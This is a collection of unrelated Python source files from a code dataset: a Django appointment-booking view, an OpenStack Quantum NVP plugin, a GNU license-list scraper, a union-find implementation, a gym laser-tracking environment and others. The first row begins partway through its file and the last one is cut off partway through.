django.views.decorators.csrf import csrf_exempt\nfrom .models import Appointment,Customer,Service\nimport json\nimport datetime\nfrom django.utils.text import phone2numeric\nfrom .EmailService import *\n'''\nAPI support\n1. Fetch \n2. Fetch free slots for a day\n3. Fetch bookings for a day\n4. Fetch bookings for a existing user\n\n'''\nfrom django.http.response import JsonResponse, HttpResponse\n\n# Method 1 : GetAllMfg\n\ndef getAllBookings(request):\n bs=[]\n bookings = Appointment.objects.all()\n for booking in bookings:\n bs.append(booking)\n return HttpResponse(json.dumps(bs),content_type='application/json')\n\ndef getAllBookingsByDate(request):\n bs=[]\n date_range_start=request.GET.get('start_date')\n dt_start=datetime.datetime.strptime(date_range_start,'%Y-%m-%d')\n date_range_end=request.GET.get('end_date')\n dt_end=datetime.datetime.strptime(date_range_end,'%Y-%m-%d')+datetime.timedelta(days=1)\n bookings=Appointment.objects.all()\n bookings=bookings.filter(serviceDate_gt=dt_start)\n bookings=bookings.filter(serviceDate_lt=dt_end)\n for booking in bookings:\n bs.append(booking.to_dict())\n return HttpResponse(json.dumps(bs),content_type='application/json')\n\n@csrf_exempt\ndef bookAppointment(request):\n in_data=None\n customer=None\n if(request.method=='POST'):\n in_data=json.loads(request.body())\n if('customer' in in_data.keys()):\n customer=getOrCreateCustomer(in_data['customer'])\n a=Appointment.objects.create()\n a.customer=customer\n s=Service.objects.get(type=in_data['service_type'])\n a.service=s\n a.serviceInstructions=in_data['serviceInstruction']\n a.serviceDateTime=datetime.datetime.strptime(in_data['dateTime'],'%Y-%m-%d %H-%M-%S')\n a.save()\n mail={'Subject':'Booking complete'}\n sendConfirmationMail(mail)\n return HttpResponse(json.dumps(a.to_dict()),content_type='application/json')\n \n\ndef getOrCreateCustomer(customer):\n email=None\n phone=None\n if('email' in customer.keys()):\n email=customer['email']\n if('phoneNumber' in customer.keys()):\n phone=customer['phoneNumber']\n if(email==None and phone==None):\n return None\n customers=Customer.objects.all()\n if(email != None and email !=\"\"):\n customers=customers.filter(email_iexact=email)\n if(phone != None and phone!=\"\"):\n customers=customers.filter(email_iexact=email)\n if(len(customers)==0):\n c=Customer.objects.create()\n if('name' in customer.keys()):\n c.name=customer['name']\n if(phone!=None):\n c.phoneNumber=phone\n if(email!=None):\n c.email=email\n c.save()\n return c\n else:\n return customers.first().to_dict()\n \n \n \n \n \n \n \n \n \n\n\n# Create your views here.\n","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"122032395","text":"\"\"\"\nCreated September 11, 2012\n\n@author: Justin Hammond, Rackspace Hosting\n\"\"\"\nimport logging\n\nimport aicq\nimport nvplib\nfrom quantum.common import exceptions as exception\n\n\nLOG = logging.getLogger(\"aicq-quantumplugin\")\nLOG.setLevel(logging.INFO)\n\n\nclass NvpPlugin(object):\n \"\"\"\n NvpPlugin is a Quantum plugin that provides L2 Virtual Network\n functionality using NVP.\n \"\"\"\n\n def __init__(self, configfile=None, loglevel=None, cli=False):\n self.blue = aicq.blue.Blue(configfile)\n pass\n\n def get_all_networks(self, tenant_id, **kwargs):\n networks = nvplib.get_all_networks(self.blue, tenant_id, [])\n LOG.debug(\"get_all_networks() completed for tenant %s: %s\" %\n (tenant_id, networks))\n return networks\n\n def create_network(self, tenant_id, net_name, **kwargs):\n \"\"\"\n Creates a new Virtual Network, and assigns it a symbolic name.\n :returns: a sequence of mappings with the following signature:\n {'net-id': uuid that uniquely identifies the\n particular quantum network,\n 'net-name': a human-readable name associated\n with network referenced by net-id\n }\n :raises:\n \"\"\"\n kwargs[\"controller\"] = self.blue\n return nvplib.create_network(tenant_id, net_name, **kwargs)\n\n def create_custom_network(self, tenant_id, net_name, transport_zone,\n controller):\n \"\"\"Not required by quantum_plugin_base.py\"\"\"\n return self.create_network(tenant_id, net_name,\n network_type=\"custom\",\n transport_zone=transport_zone,\n controller=controller)\n\n def delete_network(self, tenant_id, netw_id):\n \"\"\"\n Deletes the network with the specified network identifier\n belonging to the specified tenant.\n\n :returns: a sequence of mappings with the following signature:\n {'net-id': uuid that uniquely identifies the\n particular quantum network\n }\n :raises: exception.NetworkInUse\n :raises: exception.NetworkNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n nvplib.delete_network(self.blue, netw_id)\n\n LOG.debug(\"delete_network() completed for tenant: %s\" % tenant_id)\n return {'id': netw_id}\n\n def get_network_details(self, tenant_id, netw_id):\n \"\"\"\n Retrieves a list of all the remote vifs that\n are attached to the network.\n\n :returns: a sequence of mappings with the following signature:\n {'id': uuid that uniquely identifies the\n particular quantum network\n 'name': a human-readable name associated\n with network referenced by net-id\n 'ifaces': ['vif1_on_network_uuid',\n 'vif2_on_network_uuid',...,'vifn_uuid']\n }\n :raises: exception.NetworkNotFound\n :raises: exception.QuantumException\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = None\n remote_vifs = []\n switch = netw_id\n lports = nvplib.query_ports(self.blue, switch,\n relations=\"LogicalPortAttachment\")\n\n for port in lports:\n relation = port[\"_relations\"]\n vic = relation[\"LogicalPortAttachment\"]\n if \"vif_uuid\" in vic:\n remote_vifs.append(vic[\"vif_uuid\"])\n\n if not result:\n result = nvplib.get_networks(self.blue, switch)\n\n d = {\n \"id\": netw_id,\n \"ifaces\": remote_vifs,\n \"name\": result[\"display_name\"],\n \"net-op-status\": \"UP\",\n }\n LOG.debug(\"get_network_details() completed for tenant %s: %s\" %\n (tenant_id, d))\n return d\n\n def update_network(self, tenant_id, netw_id, **kwargs):\n \"\"\"\n Updates the properties of a particular Virtual Network.\n\n :returns: a sequence of mappings representing the new network\n attributes, with the following signature:\n {'id': uuid that uniquely identifies the\n particular quantum network\n 'name': the new human-readable name\n associated with network referenced by net-id\n }\n :raises: exception.NetworkNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = nvplib.update_network(self.blue, netw_id, **kwargs)\n LOG.debug(\"update_network() completed for tenant %s\" % tenant_id)\n return {\n \"id\": netw_id,\n \"name\": result[\"display_name\"],\n \"net-op-status\": \"UP\",\n }\n\n def get_all_ports(self, tenant_id, netw_id, **kwargs):\n \"\"\"\n Retrieves all port identifiers belonging to the\n specified Virtual Network.\n\n :returns: a list of mapping sequences with the following signature:\n [{'id': uuid representing a particular port\n on the specified quantum network\n },\n ....\n {'id': uuid representing a particular port\n on the specified quantum network\n }\n ]\n :raises: exception.NetworkNotFound\n \"\"\"\n ids = []\n filters = kwargs.get(\"filter_ops\") or {}\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n LOG.debug(\"Getting logical ports on lswitch: %s\" % netw_id)\n lports = nvplib.query_ports(self.blue, netw_id, fields=\"uuid\",\n filters=filters)\n\n for port in lports:\n ids.append({\"id\": port[\"uuid\"]})\n\n # Delete from the filter so Quantum doesn't attempt to filter on this\n # too\n if filters and \"attachment\" in filters:\n del filters[\"attachment\"]\n\n LOG.debug(\"get_all_ports() completed for tenant: %s\" % tenant_id)\n LOG.debug(\"returning port listing:\")\n LOG.debug(ids)\n return ids\n\n def create_port(self, tenant_id, netw_id, port_init_state=None, **params):\n \"\"\"\n Creates a port on the specified Virtual Network.\n\n :returns: a mapping sequence with the following signature:\n {'id': uuid representing the created port\n on specified quantum network\n }\n :raises: exception.NetworkNotFound\n :raises: exception.StateInvalid\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n params[\"controller\"] = self.blue\n result = nvplib.create_port(tenant_id, netw_id, port_init_state,\n **params)\n d = {\n \"id\": result[\"uuid\"],\n \"port-op-status\": result[\"port-op-status\"],\n }\n LOG.debug(\"create_port() completed for tenant %s: %s\" % (tenant_id, d))\n return d\n\n def update_port(self, tenant_id, netw_id, portw_id, **params):\n \"\"\"\n Updates the properties of a specific port on the\n specified Virtual Network.\n\n :returns: a mapping sequence with the following signature:\n {'id': uuid representing the\n updated port on specified quantum network\n 'state': update port state (UP or DOWN)\n }\n :raises: exception.StateInvalid\n :raises: exception.PortNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n LOG.debug(\"Update port request %s\" % (params))\n params[\"controller\"] = self.blue\n result = nvplib.update_port(netw_id, portw_id, **params)\n LOG.debug(\"update_port() completed for tenant %s\" % tenant_id)\n port = {\n \"id\": portw_id,\n \"port_state\": result[\"admin_status_enabled\"],\n \"port-op-status\": result[\"port-op-status\"],\n }\n return port\n\n def delete_port(self, tenant_id, netw_id, portw_id):\n \"\"\"\n Deletes a port on a specified Virtual Network,\n if the port contains a remote interface attachment,\n the remote interface is first un-plugged and then the port\n is deleted.\n\n :returns: a mapping sequence with the following signature:\n {'port-id': uuid representing the deleted port\n on specified quantum network\n }\n :raises: exception.PortInUse\n :raises: exception.PortNotFound\n :raises: exception.NetworkNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n nvplib.delete_port(self.blue, netw_id, portw_id)\n LOG.debug(\"delete_port() compelted for tenant %s\" % tenant_id)\n return {\"id\": portw_id}\n\n def get_port_details(self, tenant_id, netw_id, portw_id):\n \"\"\"\n This method allows the user to retrieve a remote interface\n that is attached to this particular port.\n\n :returns: a mapping sequence with the following signature:\n {'id': uuid representing the port on\n specified quantum network\n 'network-id': uuid representing the particular\n quantum network\n 'attachment': uuid of the virtual interface\n bound to the port, None otherwise\n }\n :raises: exception.PortNotFound\n :raises: exception.NetworkNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n port = nvplib.get_port(self.controller, netw_id, portw_id,\n \"LogicalPortAttachment\")\n state = \"ACTIVE\" if port[\"admin_status_enabled\"] else \"DOWN\"\n op_status = nvplib.get_port_status(self.blue, netw_id, portw_id)\n\n relation = port[\"relation\"]\n attach_type = relation[\"LogicalPortAttachment\"][\"type\"]\n\n vif_uuid = \"None\"\n if attach_type == \"VifAttachment\":\n vif_uuid = relation[\"logicalPortAttachment\"][\"vif_uuid\"]\n\n d = {\n \"id\": portw_id, \"attachment\": vif_uuid,\n \"network-id\": netw_id, \"port_state\": state,\n \"port-op-status\": op_status,\n }\n return d\n\n def plug_interface(self, tenant_id, netw_id, portw_id,\n remote_interface_id):\n \"\"\"\n Attaches a remote interface to the specified port on the\n specified Virtual Network.\n\n :returns: None\n :raises: exception.NetworkNotFound\n :raises: exception.PortNotFound\n :raises: exception.AlreadyAttached\n (? should the network automatically unplug/replug)\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = nvplib.plug_interface(self.blue, netw_id, portw_id,\n \"VifAttachment\",\n attachment=remote_interface_id)\n LOG.debug(\"plug_interface() completed for tenant %s: %s\" %\n (tenant_id, result))\n\n def unplug_interface(self, tenant_id, netw_id, portw_id):\n \"\"\"\n Detaches a remote interface from the specified port on the\n specified Virtual Network.\n\n :returns: None\n :raises: exception.NetworkNotFound\n :raises: exception.PortNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, netw_id, tenant_id):\n raise exception.NetworkNotFound(net_id=netw_id)\n result = nvplib.unplug_interface(self.blue, netw_id, portw_id)\n\n LOG.debug(\"unplug_interface() compelted for tenant %s: %s\" %\n (tenant_id, result))\n\n def get_port_stats(self, tenant_id, network_id, port_id):\n \"\"\"\n Not required by quantum_plugin_base.py\n Returns port statistics for a given port.\n\n {\n \"rx_packets\": 0,\n \"rx_bytes\": 0,\n \"tx_errors\": 0,\n \"rx_errors\": 0,\n \"tx_bytes\": 0,\n \"tx_packets\": 0\n }\n\n :returns: dict() of stats\n :raises: exception.NetworkNotFound\n :raises: exception.PortNotFound\n \"\"\"\n if not nvplib.check_tenant(self.blue, network_id, tenant_id):\n raise exception.NetworkNotFound(net_id=network_id)\n return nvplib.get_port_stats(self.blue, network_id, port_id)\n","sub_path":"aicq/QuantumPlugin.py","file_name":"QuantumPlugin.py","file_ext":"py","file_size_in_byte":13368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"82418203","text":"from random import randrange\nimport base64, json\n\nclass MovieCommit:\n def load_file(self, filename):\n \"\"\" Just a simple function to grab the correct file and read it into\n a list. Might want to abstract this a bit more so we can swap a\n db in place. Python's version of the repository pattern? \"\"\"\n f = [line.rstrip() for line in open('data/'+ filename + '.txt')]\n return f\n\n def get_quote(self, movies, permalink = None):\n \"\"\" Facade for everything. If we don't have a permalink\n then just grabe a movie and line and call the get_quote_by_id\n method. Otherwise, decode the permalink and return the data.\n Randrange method called to start at 1 instead of 0 to account for\n the first line being the movie title. \"\"\"\n if permalink is None:\n movie = self.get_movie(movies)\n line = randrange(1, len(movie) - 1, 1)\n else:\n data = self.decode_permalink(permalink)\n movie = data[0]\n line = data[1]\n\n return self.get_quote_by_id(movie, line)\n\n def get_quote_by_id(self, movie, line):\n \"\"\" We have what we need. Load the correct file, make the permalink\n and then structure the dictionary for return. Simple stuff. \"\"\"\n lines = self.load_file(movie)\n permalink = self.encode_permalink(movie, line)\n return {\n 'title': lines[0],\n 'quote': lines[line],\n 'file': movie,\n 'line': line,\n 'permalink': permalink\n }\n\n def get_movie(self, movies):\n \"\"\" Just get me a random element from the list. \"\"\"\n count = len(movies)\n n = randrange(0, count - 1, 1)\n return movies[n]\n\n def encode_permalink(self, movie, line):\n \"\"\" Permalink is a list with the filename and line number. Convert the list to json\n and then base64 encode the damn thing. Something about proper padding ... \"\"\"\n return base64.b64encode(json.dumps([movie, line]))\n\n def decode_permalink(self, permalink):\n \"\"\" Do the opposite of the encode_permalink method. Decode the string, and then load\n it as json to make it a dictionary. Something about proper padding ... \"\"\"\n return json.loads(base64.b64decode(permalink))","sub_path":"moviecommit.py","file_name":"moviecommit.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"140749060","text":"from itertools import permutations\r\n\r\nclass solution:\r\n def permutation_(self, n: int) -> int:\r\n num = list(permutations([1,2,3,4,5,6,7,8,9], 3))\r\n\r\n for _ in range(n):\r\n test, s, b = map(int, input().split())\r\n test = list(str(test))\r\n remove_cnt = 0\r\n\r\n for i in range(len(num)):\r\n i -= remove_cnt\r\n strk_cnt = 0\r\n ball_cnt = 0\r\n\r\n for j in range(3):\r\n if int(test[j]) in num[i]:\r\n if j == num[i].index(int(test[j])):\r\n strk_cnt += 1\r\n\r\n else:\r\n ball_cnt += 1\r\n\r\n if strk_cnt != s or ball_cnt != b:\r\n num.remove(num[i])\r\n remove_cnt += 1\r\n \r\n return len(num)\r\n\r\nsol = solution()\r\n\r\nn = int(input())\r\n\r\nprint(sol.permutation_(n))\r\n\r\n","sub_path":"geonhokim/1.Brute_force_Search/숫자야구.py","file_name":"숫자야구.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230500452","text":"from pathlib import Path\nimport re\nfrom ast import literal_eval\nfrom stk import (\n BuildingBlock,\n ConstructedMolecule,\n cage,\n)\n\n\ndef load_population(pop_path):\n '''Loads the population of molecules from the EA.'''\n with open(pop_path, 'r') as f:\n pop = []\n subpop = []\n if 'fitness' in pop_path:\n recording = True\n else:\n recording = False\n\n gen = 1\n\n for line in f:\n # Initial population treated differently.\n if gen == 1:\n if 'Population log:' in line:\n recording = True\n elif 'ConstructedMolecule' in line and recording:\n subpop.append(line)\n elif 'Starting generation' in line and recording:\n recording = False\n pop.append(subpop)\n subpop = []\n gen += 1\n elif gen != 1:\n if 'Selecting members' in line:\n recording = True\n elif 'ConstructedMolecule' in line and recording:\n subpop.append(line)\n elif 'Starting' in line or 'Successful' in line and recording:\n recording = False\n pop.append(subpop)\n subpop = []\n gen += 1\n return pop\n\n\ndef parse_population(pop):\n # Import modules from stk.\n stk_pop = []\n for sp in pop:\n subpop = []\n for mem in sp:\n p_bb = re.compile('(Const[^\\t]+)')\n stk_mem = eval(p_bb.search(mem)[0])\n stk_mem.fitness_vector = literal_eval(\n re.search('\\t(\\[([^\\,]+\\,)+[^\\]]+\\])', mem).group(1))\n stk_mem.fitness_value = literal_eval(\n re.search('(\\d+\\.\\d+|1e-08)(?=$)', mem).group(0))\n subpop.append(stk_mem)\n stk_pop.append(subpop)\n return stk_pop\n\n\ndef get_stk_pop(pop_path):\n pop_path = Path(pop_path)\n pop = load_population(str(pop_path))\n pop = {pop_path: parse_population(pop)}\n return pop\n\n\n","sub_path":"stages/stage3_ea_analysis/create_image/analyse_population.py","file_name":"analyse_population.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611088895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 4 18:45:06 2020\n\n@author: alan\n\"\"\"\n\n\nimport numpy as np\nimport gym\nimport cv2\nfrom gym import spaces\nfrom path_following.envs.envUtils import utils\nfrom gym.envs.classic_control import rendering\nfrom scipy.spatial import cKDTree\nfrom colorama import Fore, Style\n\n\nclass Laser2DLine(gym.Env):\n \"\"\"\n Custom environment that follows gym interface. This env renders a 2D\n texture and plots a laser. The agent must learn how to follow a trajectory\n with the laser keep a orientation normal to the trajectory.\n \"\"\"\n metadata = {'render.modes': ['human', 'rgb_array']}\n\n def __init__(self):\n super(Laser2DLine, self).__init__()\n \"Initialize environment variables\"\n params = {\"window_shape\": (60, 60, 3),\n \"world_size\": (600, 600),\n \"laser_length\": 40,\n \"laser_diam\": 5,\n \"domain_randomization\": True,\n \"n_points\": 600,\n \"timesteps\": 1000\n }\n\n self.window_shape = params[\"window_shape\"]\n self.world_size = params[\"world_size\"]\n self.laser_length = params[\"laser_length\"]\n self.laser_diam = params[\"laser_diam\"]\n self.dr = params[\"domain_randomization\"]\n self.n_points = params[\"n_points\"]\n self.timestep_limit = params[\"timesteps\"]\n self.action_space = spaces.MultiDiscrete([3, 3, 3])\n self.observation_space = spaces.Box(low=0, high=255,\n shape=self.window_shape,\n dtype=np.uint8)\n self.viewer = None\n\n def reset(self):\n self.world, self.trajectory = utils.render_world(self.n_points,\n self.world_size,\n self.dr)\n if self.dr:\n self.laser_length = np.random.randint(10, self.window_shape[0])\n self.laser_diam = np.random.randint(5, 10)\n\n self.KDT = cKDTree(self.trajectory[:, 0:2])\n self.state = self.trajectory[0, :]\n self.goal = self.trajectory[-1, :]\n self.timestep = 0\n self.c_reward = 0\n self.points_in = 0\n self.laser_traj = []\n self.laser_traj.append(self.state.astype(np.int32))\n self.worldL, self.observation = utils.render_laser_line(self.state,\n np.copy(self.world),\n self.laser_length,\n self.laser_diam,\n self.window_shape)\n return self.observation\n\n def step(self, action):\n self.timestep += 1\n info = {}\n info[\"status\"] = \"ok\"\n done = False\n reward = 0\n self.state += action - np.ones(action.shape, dtype=np.int32)\n self.state[0:2] = np.clip(self.state[0:2], [0, 0], [self.world_size])\n if self.state[2] == 360:\n self.state[2] = 0\n if self.state[2] == -1:\n self.state[2] = 359\n self.laser_traj.append(self.state.astype(np.int32))\n self.worldL = utils.render_laser_traj(np.copy(self.world),\n self.laser_traj,\n self.laser_diam)\n self.worldL, self.observation = utils.render_laser_line(self.state,\n self.worldL,\n self.laser_length,\n self.laser_diam,\n self.window_shape)\n\n reward, self.points_in, pos_error, ori_error = utils.calculate_reward_line(self.trajectory, self.KDT,\n self.laser_traj, self.points_in)\n dist2Goal = np.linalg.norm(self.goal[0:2]-self.state[0:2])\n\n if dist2Goal < 20:\n done = True\n info[\"status\"] = \"goal reached\"\n reward += 100\n elif self.timestep > self.timestep_limit:\n info[\"status\"] = \"timesteps limit reached\"\n done = True\n self.c_reward += reward\n info[\"state\"] = self.state\n info[\"world\"] = self.worldL\n info[\"timesteps\"] = self.timestep\n info[\"cReward\"] = self.c_reward\n info[\"pos_error\"] = pos_error\n info[\"ori_error\"] = ori_error\n\n if done and info[\"status\"] == \"goal reached\":\n print(Fore.GREEN + \"reward: {0:.2f}, timesteps: {1}, status: {2}\\\n \".format(info[\"cReward\"], info[\"timesteps\"], info[\"status\"]) + Style.RESET_ALL)\n return self.observation, reward, done, info\n\n def render(self, mode=\"human\"):\n if self.viewer is None:\n self.viewer = rendering.SimpleImageViewer()\n if mode == \"human\":\n self.viewer.imshow(self.observation)\n\n elif mode == \"rgb_array\":\n render_frame = np.copy(self.worldL)\n render_frame[5:self.window_shape[1]+5, 5:self.window_shape[0]+5] = self.observation\n cv2.rectangle(render_frame, (0,0), (self.window_shape[1]+10, self.window_shape[0]+10),\n (0,0,0), 5)\n return render_frame\n #return self.worldL, self.observation\n\n def close(self):\n pass\n","sub_path":"path_following/envs/laser_2DLine.py","file_name":"laser_2DLine.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"530568164","text":"#!python3\n#encoding:utf-8\nimport dataset\nfrom bs4 import BeautifulSoup\nimport time\nimport os.path\nimport requests\n\nclass GnuSite(object):\n def __init__(self, path_gnu_licenses_sqlite3):\n self.__db_license = dataset.connect('sqlite:///' + path_gnu_licenses_sqlite3)\n\n def GetAll(self):\n for lang in self.__GetAllLanguages():\n self.processing_language_code = lang\n soup = BeautifulSoup(self.__GetHtmlString(lang), 'html.parser')\n for div in soup.select('div.big-section'):\n typeName = self.__GetSection(div)\n print(typeName)\n\n def __GetAllLanguages(self):\n langs = []\n soup = BeautifulSoup(self.__GetHtmlString('en'), 'html.parser')\n for span in soup.find('div', id='translations').find('p').find_all('span'):\n langs.append(span.find('a').get('lang'))\n print(span.find('a').get('lang'))\n return langs\n\n def __GetHtmlString(self, lang):\n url = 'https://www.gnu.org/licenses/license-list.{0}.html'.format(lang)\n path_this_dir = os.path.abspath(os.path.dirname(__file__))\n file_name = os.path.basename(url)\n file_path = os.path.join(path_this_dir, file_name)\n if os.path.isfile(file_path):\n print('ファイル読み込み-----------------------')\n with open(file_path, 'rb') as f:\n html_str = f.read()\n else:\n print('HTTPリクエスト-----------------------')\n time.sleep(2)\n r = requests.get(url)\n html_str = r.content\n with open(file_path, 'wb') as f:\n f.write(html_str)\n return html_str\n\n def __GetSection(self, div):\n h3Id = div.find('h3').get('id')\n print('{0},{1}'.format(h3Id, div.find('h3').string.strip()))\n if 'SoftwareLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('h4').get('id')\n if 'GPLCompatibleLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n elif 'GPLIncompatibleLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n elif 'NonFreeSoftwareLicenses' == h4Id:\n self.__GetDl(sub, 'software')\n else:\n break\n elif 'DocumentationLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('h4').get('id')\n if 'FreeDocumentationLicenses' == h4Id:\n self.__GetDl(sub, 'document')\n elif 'NonFreeDocumentationLicenses' == h4Id:\n self.__GetDl(sub, 'document')\n else:\n break\n elif 'OtherLicenses' == h3Id:\n for sub in div.find_all_next('div', class_='big-subsection'):\n h4Id = sub.find('span').find('a').get('href')\n if None is not sub.find('h4').string:\n print('{0},{1}'.format(h4Id, sub.find('h4').string.strip()))\n else:\n print('{0},{1}'.format(h4Id, sub.find('h4').string))\n if '#OtherLicenses' == h4Id:\n print(h4Id + '---------------')\n dl = self.__GetDl(sub, 'other')\n dl = self.__GetDl(dl, 'other')\n dl = self.__GetDl(dl, 'other')\n dl = self.__GetDl(dl, 'other')\n elif '#Fonts' == h4Id:\n print(h4Id + '---------------')\n dl = self.__GetDl(sub, 'other.font')\n dl = self.__GetDl(dl, 'other.font')\n elif '#OpinionLicenses' == h4Id:\n print(h4Id + '---------------')\n self.__GetDl(sub, 'other.opinion')\n elif '#Designs' == h4Id:\n print(h4Id + '---------------')\n self.__GetDl(sub, 'other.design')\n \n def __GetDl(self, div, targetValue):\n dl = div.find_next('dl')\n if None is dl:\n return\n print(\"dtの数={0}\".format(len(dl.find_all('dt'))))\n print(\"ddの数={0}\".format(len(dl.find_all('dd'))))\n for dt in dl.find_all('dt'):\n for a in dt.find_all('a'):\n if None is not a.string:\n name = a.string.strip().replace('\\n', '')\n try:\n if 'en' == self.processing_language_code:\n self.__db_license['Licenses'].insert(self.__CreateLicense(dl, dt, targetValue))\n license = self.__db_license['Licenses'].find_one(HeaderId=self.__GetHeaderId(dt))\n if None is self.__db_license['Multilingual'].find_one(LicenseId=license['Id'], LanguageCode=self.processing_language_code):\n self.__db_license['Multilingual'].insert(self.__CreateMultilingual(dt, name, self.__db_license['Licenses'].find_one(HeaderId=self.__GetHeaderId(dt))['Id']))\n except Exception as e:\n print('%r' % e)\n return dl\n \n def __CreateLicense(self, dl, dt, targetValue):\n print(self.__GetHeaderId(dt))\n record = dict(\n HeaderId=self.__GetHeaderId(dt),\n ColorId=self.__db_license['Colors'].find_one(Key=dl.get('class'))['Id'],\n Target=targetValue,\n Url=dt.find('a').get('href')\n )\n print(record)\n return record\n\n def __CreateMultilingual(self, dt, name, license_id):\n record = dict(\n LicenseId=license_id,\n LanguageCode=self.processing_language_code,\n Name=name,\n Description=dt.find_next('dd').decode_contents(formatter=\"html\").strip(),\n )\n print(record)\n return record\n\n def __GetHeaderId(self, dt):\n headerId = ''\n if None is dt.find('span'):\n return None\n for a in dt.find('span').find_all('a'):\n headerId += a.string + ','\n return headerId[:-1]\n\n\nif __name__ == '__main__':\n gnu = GnuSite(\n path_gnu_licenses_sqlite3 = './GNU.Licenses.sqlite3'\n )\n gnu.GetAll()\n\n","sub_path":"database/src/gnu_license/insert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"83847482","text":"import numpy as np\n\n\nclass WeightedQuickUnion():\n \"\"\"\n 动态连通性问题\n 建立平衡树:小数加到大树上\n \"\"\"\n\n def __init__(self, N):\n self.N = N # 联通分量的数量\n self.id = np.arange(N).tolist() # 该数组记录每个元素的父节点的联通分量的id\n self.size = [1] * N # 记录联通分量包含元素的个数\n\n def is_connected(self, p, q):\n\n return self.find(p) == self.find(q)\n\n def find(self, p):\n \"\"\"\n 时间复杂度:O(lgn)\n \"\"\"\n while p != self.id[p]:\n p = self.id[p]\n return p\n\n def union(self, p, q):\n '''\n 时间复杂度:O(lgn)\n '''\n\n idp = self.find(p)\n idq = self.find(q)\n\n if self.size[idp] < self.size[idq]:\n self.id[idp] = idq\n self.size[idq] += self.size[idp]\n else:\n self.id[idq] = idp\n self.size[idp] += self.size[idq]\n self.N -= 1\n\n def count(self):\n return self.N\n\n\nif __name__ == '__main__':\n f = open(\"../data/uf.txt\", \"r\")\n N = int(f.readline())\n uf = WeightedQuickUnion(N)\n\n while True:\n s = f.readline().strip()\n if not s:\n break\n p, q = s.split(\" \")\n p, q = int(p), int(q)\n if not uf.is_connected(p, q):\n uf.union(p, q)\n print(uf.is_connected(p, q))\n f.close()\n\n print(str(uf.count()) + \" components\")\n print(\"is 1 and 2 connected ? \" + str(uf.is_connected(1, 2)))\n print(\"is 2 and 9 connected ? \" + str(uf.is_connected(2, 9)))\n","sub_path":"Algorithms/chapter1_basic/weighted_quick_union.py","file_name":"weighted_quick_union.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"483817437","text":"## implement algorithm for NB NMF\n## Reference\n## Negative Binomial Matrix Factorization for Recommender Systems\n## Olivier Gouvert, Thomas Oberlin, Cédric Févotte\n\n\nimport numpy as np\nfrom numpy import log\nfrom scipy.special import psi\n# from scipy.special import softmax\nfrom scipy.special import logsumexp, gamma, psi, gammaln\nimport time\nimport sys\n\nfrom sklearn.decomposition.nmf import _initialize_nmf\nfrom scipy.optimize import minimize\n#from misc import negll_nb, negll_nb_der\n\n## MODEL:\n## X_ij ~ NB(a, lam_ij/(a+lam_ij))\n## lam_ij = sum_k l_ik f_jk\n\n## E X_ij = (LF')_ij\n## Var(X_ij) = (LF')_ij(1 + 1/a * (LF')_ij)\n## so when a --> +inf, distribution close to Poisson(LF')\n\n\n\n# def cost_full(X, Lam, a):\n# \ta = a.reshape(1,-1)\n# ll = gammaln(X + a) - gammaln(a)+ X * log(Lam/(Lam + a)) + a * log(a/(a+ Lam))\n# return -np.sum(ll)\n\ndef cost_full(X, Lam, a):\n\ta = a.reshape(1,-1)\n\tll = gammaln(X + a) - gammaln(a)+ X * log(Lam/(Lam + a)) + a * log(a/(a+ Lam))\n\treturn -np.sum(ll)\n\n## it is the source code for scipy.specia.softmax, but I cannot import it for some reason \ndef softmax(x, axis=None):\n\treturn np.exp(x - logsumexp(x, axis=axis, keepdims=True))\n\n\n### ----------------------------------------\n### update L, F, a in EM iterations\n### a is a list of size p (n_feature)\n### ----------------------------------------\ndef em_full(X, k, a, init, LF = None, maxiter = 100, verbose = True, eval_every = 10, tol = 1e-03, random_state = 123, return_loss = False, fix = [False,False,False]):\n\te = sys.float_info.min\n\t## init\n\tif init is None:\n\t\tL, F= LF\n\telse:\n\t\tL, Ft = _initialize_nmf(X, k, init=init, 